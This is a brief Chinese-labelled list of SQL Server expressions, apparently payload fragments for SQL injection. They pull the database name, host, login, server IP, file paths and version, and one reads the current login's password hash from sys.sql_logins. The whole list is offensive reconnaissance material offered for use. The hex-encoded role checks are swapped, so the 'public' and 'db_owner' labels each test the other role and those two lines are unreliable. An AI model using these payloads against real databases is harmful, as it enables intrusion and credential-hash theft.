﻿当前数据库：db_name()
主机名：host_name()
当前用户：system_user
当前用户密码Hash：(select sys.fn_varbintohexstr(password_hash) from sys.sql_logins where name=system_user)
数据库版本：substring(@@version,0,60)
主机IP：(select top 1 local_net_address from sys.dm_exec_connections where local_net_address is not null)
数据文件：(select top 1 filename from sysfiles)
public：cast(is_member(0x640062005F006F0077006E0065007200) as varchar)
db_owner：cast(is_member(0x7000750062006C0069006300) as varchar)